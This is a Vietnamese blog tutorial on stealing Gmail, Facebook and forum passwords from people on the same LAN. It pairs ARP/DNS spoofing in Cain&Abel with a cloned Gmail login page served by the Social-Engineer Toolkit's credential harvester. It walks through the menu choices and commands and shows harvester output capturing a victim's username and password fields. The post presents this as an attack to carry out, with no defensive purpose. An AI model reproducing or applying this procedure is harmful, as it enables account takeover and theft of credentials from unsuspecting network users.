Hack Gmail, Facebook.... với Backtrack & Cain&Abel

Lưu ý: mình giải thích mọi nguyên lý và trường hợp trong bài viết này, ĐỀ NGHỊ các bạn đọc toàn bộ từ đầu đến cuối, mình đã test riêng cũng như chung các phương pháp, duy chỉ vì không có máy ảo để chụp màn hình. Mình sẽ không nhận trả lời những trường hợp thất bại do không đọc kỹ.


Giới thiệu:


_ Bài này sẽ hướng dẫn các bạn đánh cắp thông tin tài khoản của những người trong mạng LAN. Chẳng hạn như Google, Facebook, Vn-Zoom, Voz,...

_ Các bạn sẽ cần 1 máy tính chạy Backtrack ( máy thật hoặc máy ảo đều được)

[+] Lưu ý: vì mình mới cài lại windows nên chưa có cài máy ảo, những hình ảnh mình sử dụng dưới đây đều có nguồn tổng hợp từ internet. Những bước hướng dẫn dưới đây là tổng hợp lại từ những lần test nhiều tuần trước (thế nên đừng bảo là mình chém gió hay gì nhé )

_ Để cho các bạn dễ hiểu mình sẽ sử dụng tool quen thuộc đó là : Cain&Abel (lưu ý là Cain&Abel chỉ hỗ trợ 1 phần trong hướng dẫn này, chứ không phải là dùng nó để dò pass)



Cấu hình máy giả định:


[+] Phía Attacker:
_ Máy tính chạy Windows có cài Cain&Abel, địa chỉ IP 10.0.0.10
_ Máy ảo chạy Backtrack, địa chỉ IP 10.0.0.11


[+] Phía Victim:
_ Máy tính chạy Windows, trình duyệt Google Chrome, địa chỉ IP 10.0.0.12

Phương thức/Nguyên lý tấn công:

_ Mình sẽ áp dụng 2 phương pháp, đó là:

----> Man-In-The-Middle (MITM) (những ai đọc các bài hướng dẫn trước sẽ được mình đề cập/giải thích về cái này), tool tiêu biểu: NetCut, Cain&Abel...

----> Social Engineering Toolkit: một bộ tool của Backtrack rất mạnh, hữu ích, dễ sử dụng và rất NGUY HIỂM nếu sử dụng không đúng mục đích.

Nguyên lý : mình sẽ tạo một trang web login giả mạo bằng cách clone website, sau đó dùng MITM buộc victim phải vào web của mình mỗi khi họ định vào web mà mình muốn đánh cắp. Ví dụ: để đánh cắp Gmail, mình sẽ tạo 1 web gmail giả, host nó trên chính máy mình, sau đó dùng MITM để mỗi khi victim gõ gmail.com vào trình duyệt thì sẽ bị chuyển qua web giả mạo mà không hề biết. 

_ Giới thiệu sơ về:

[+] Man-In-The-Middle (MITM): trong 1 hệ thống mạng, router đóng vai trò như người vận chuyển, đưa thư, router sẽ nhận và chuyển những request (yêu cầu) từ client (các máy trong mạng) ra internet.
Vì vậy nếu như ta mạo danh, giả thành 1 người đứng ở giữa client và router, thì mọi traffic (dữ liệu) đều đi qua ta trước khi đến được router. 

Hình minh họa:


[+] Social Engineering: là một phương pháp của các hacker dựa trên yếu tố con người, khác với đối với máy móc, vốn dựa trên lỗi phát sinh. Social Engineering dựa vào sự cả tin và bất cẩn của victim để khai thác. Giống như bạn đang dụ người kia khai ID và password vậy.



Thực hiện:

/* Thực hiện tuần tự các bước dưới đây */


MITM:

_ Trước hết ta mở Cain&Abel, chọn card mạng để tấn công.





_ Bắt đầu sniff:





_ Kế đến, ta chuyển qua tab ARP, chọn máy victim và nhấn add.





_ Nhìn qua bên tay trái, chọn ARP-DNS, ấn vào dấu + để add web.Ở ô dưới, ta gõ IP của máy Backtrack





Lưu ý: nếu bạn có 1 website giả mạo ở trên một host nào đó thì ấn vào resolve, điền website đó vào





_ Cuối cùng ta ấn Start để bắt đầu MITM:




Hết bước 1


Social Engineering:


_ Trước hết ta mở Backtrack, mở console và gõ:
Code:
    cd /pentest/exploits/set
và:
Code:
    ./set


_ Một chương trình sẽ chạy, và yêu cầu nhập lựa chọn, ta chọn "2" (Website Attack Vector)




_ Kế đến, ta chọn số "3" (Credential Harvester)




_ Sau đó ta có 2 chọn lựa, ta có thể dùng mẫu có sẵn, hoặc clone website, ở đây ta chọn clone ( số "2")



_ Ta gõ website cần được clone vào (mình chọn gmail)

Code:
Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into a report.


SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.[*] I have read the above message.[*]

Press {return} to continue.[*] Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:


_ Khi victim truy cập vào gmail, họ sẽ bị redirect sang web giả mạo của ta



_ Những thông tin tài khoản sẽ được hiện lên màn hình:

Code:
[*] Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:
172.16.32.131 - - [09/Sep/2010 10:12:55] "GET / HTTP/1.1" 200 -[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7536764660264620804
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=nwAWNiTEqGc
POSSIBLE USERNAME FIELD FOUND: Email=thisismyuser
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
Thế là xong 

Share on Google Plus

About thanh

    Blogger Comment
    Facebook Comment

0 nhận xét:

Đăng nhận xét

cắt mí mắt